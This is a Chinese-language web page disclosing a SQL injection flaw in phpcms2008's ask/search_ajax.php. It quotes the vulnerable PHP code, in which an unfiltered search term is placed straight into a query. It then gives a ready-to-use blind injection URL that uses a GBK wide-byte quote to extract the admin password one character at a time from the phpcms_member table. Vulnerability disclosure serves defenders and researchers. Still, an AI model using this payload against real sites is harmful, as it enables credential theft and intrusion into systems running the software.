手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >phpcms2008 注入漏洞
phpcms2008 注入漏洞
摘要:这个是最新有人发现的该漏洞文件:ask/search_ajax.php漏洞说明:/ask/search_ajax.phpCode:if($q...

这个是最新有人发现的

该漏洞文件:ask/search_ajax.php

漏洞说明:

/ask/search_ajax.php

Code:

if($q)

{

$where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where

}

else

{

exit('null');

}

$infos = $ask->listinfo($where, 'askid DESC', '', 10);

/ask/include/answer.class.php

Code:

function listinfo($where = '', $order = '', $page = 1, $pagesize = 50)

{

if($where) $where = " WHERE $where";

if($order) $order = " ORDER BY $order";

$page = max(intval($page), 1);

$offset = $pagesize*($page-1);

$limit = " LIMIT $offset, $pagesize";

$r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where");

$number = $r['number'];

$this->pages = pages($number, $page, $pagesize);

$array = array();

$i = 1;

$result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit");

while($r = $this->db->fetch_array($result))

{

$r['orderid'] = $i;

$array[] = $r;

$i++;

}

$this->number = $this->db->num_rows($result);

$this->db->free_result($result);

return $array;

}

测试方法:

/ask/search_ajax.php?q=s%D5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23

【phpcms2008 注入漏洞】相关文章:

phpcms V9 BLind SQL 注入漏洞0day

战略战争游戏DropTeam多个远程安全漏洞

Windows 内核漏洞 ms08025 分析

IBM WebSphere MQ队列管理器绕过安全限制漏洞

恒浪IMS整合系统V4.1 多文件存在SQL注入漏洞

phpcms2008 注入漏洞 利用分析

Microsoft Internet Explorer FTP含命令注入漏洞

入侵检测系统漏洞的分析

PHP 5 php_sprintf_appendstring() 整数溢出漏洞

WordPress WassUp插件 spy.php脚本含SQL注入漏洞

精品推荐
分类导航